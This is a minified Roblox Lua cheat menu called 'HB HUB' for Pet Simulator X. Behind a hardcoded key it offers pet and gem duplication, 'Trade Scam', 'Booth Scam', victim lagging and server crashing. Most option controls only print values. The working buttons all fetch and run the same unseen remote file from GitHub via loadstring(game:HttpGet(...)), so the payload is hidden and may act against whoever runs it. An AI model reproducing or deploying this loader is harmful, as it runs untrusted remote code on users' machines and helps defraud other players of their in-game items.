





























































local a=loadstring(game:HttpGet(('https://raw.githubusercontent.com/HBHUB-hub/PSX-Scripe/main/local-tap')))()local b=a:MakeWindow({Name="HB HUB",HidePremium=false,SaveConfig=true,ConfigFolder="OrionTest"})local b=b:MakeTab({Name="Key",Icon="rbxassetid://4483345998",PremiumOnly=false})_G.Key="HGyg234Hub87je"_G.KeyInput="string"function MakeScriptHub()local a=a:MakeWindow({Name="HB Hub",HidePremium=false,SaveConfig=true,ConfigFolder="HB Hub"})local b=a:MakeTab({Name="Info",Icon="rbxassetid://4483345998",PremiumOnly=false})local c=b:AddSection({Name="Pet Simulator X Trade Scam! WORKING 2022!"})b:AddParagraph("Made By HB_HUB")local c=b:AddSection({Name="Status"})b:AddLabel("Dupe: ✅")b:AddLabel("Trade Scam: ✅")b:AddLabel("Booth Scam: ✅")local c=b:AddSection({Name="Update Logs"})b:AddParagraph("[✨SHINY] UPDATE","Version 4.2")b:AddParagraph("Duping Is Fully Fixed and Optimized","")b:AddParagraph("Trading Scam Fully Fixed!","")b:AddParagraph("BUGS Fixed!","")b:AddParagraph("Crash Game Fixed!","")b:AddParagraph("Game Error 277 Fixed!","")local b=a:MakeTab({Name="Dupe",Icon="rbxassetid://4483345998",PremiumOnly=false})local c=b:AddSection({Name="Dupe Section"})b:AddButton({Name="(RISK) Start Dupe",Callback=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/HBHUB-hub/PSX-Scripe/main/dupe-main2"))()end})local c=b:AddSection({Name="Dupe Options"})b:AddSlider({Name="Select Pets Limits",Min=0,Max=20,Default=1,Color=Color3.fromRGB(255,255,255),Increment=1,ValueName="PETS",Callback=function(a)print(a)end})b:AddToggle({Name="Dupe Only Equiped Pets",Default=false,Callback=function(a)print(a)end})b:AddToggle({Name="(RISK) Dupe Gems",Default=false,Callback=function(a)print(a)end})b:AddTextbox({Name="Rename all pets",Default="Text Goes here",TextDisappear=true,Callback=function(a)print(a)end})local b=a:MakeTab({Name="Trade Scam",Icon="rbxassetid://4483345998",PremiumOnly=false})local c=b:AddSection({Name="ON/OFF"})b:AddButton({Name="Trade Scam",Default=false,Callback=function(a)loadstring(game:HttpGet("https://raw.githubusercontent.com/HBHUB-hub/PSX-Scripe/main/dupe-main2"))()end})local c=b:AddSection({Name="Trade Scam Options"})b:AddSlider({Name="Lag Victim For",Min=0,Max=60,Default=10,Color=Color3.fromRGB(255,255,255),Increment=1,ValueName="Seconds",Callback=function(a)print(a)end})b:AddButton({Name="LagTrade",Default=false,Callback=function(a)print(a)end})b:AddParagraph("Bot-Trade","Coming Soon!")local b=a:MakeTab({Name="Booth Scam",Icon="rbxassetid://4483345998",PremiumOnly=false})local c=b:AddSection({Name="Booth Section"})b:AddButton({Name="Booth Scam",Callback=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/HBHUB-hub/PSX-Scripe/main/dupe-main2"))()end})local c=b:AddSection({Name="Booth Options"})b:AddBind({Name="KeyBind",Default=Enum.KeyCode.E,Hold=false,Callback=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/HBHUB-hub/PSX-Scripe/main/dupe-main2"))()end})b:AddTextbox({Name="Gems For use",Default="Index:1b",TextDisappear=true,Callback=function(a)print(a)end})b:AddLabel("After you bought something from Booth, Click Booth Scam!")local a=a:MakeTab({Name="Others",Icon="rbxassetid://4483345998",PremiumOnly=false})local b=a:AddSection({Name="Server"})a:AddButton({Name="Crash Server",Callback=function()print("button pressed")end})a:AddButton({Name="Hop Servers",Callback=function()print("button pressed")end})local b=a:AddSection({Name="Other Scripts"})a:AddButton({Name="Infinite Yields",Callback=function()loadstring(game:HttpGet('https://raw.githubusercontent.com/HBHUB-hub/PSX-Scripe/main/dupe-main2'))()end})end;b:AddTextbox({Name="Key",Default="",TextDisappear=true,Callback=function(a)_G.KeyInput=a end})b:AddButton({Name="Check Key",Callback=function()if _G.KeyInput==_G.Key then MakeScriptHub()end end})a:Init()
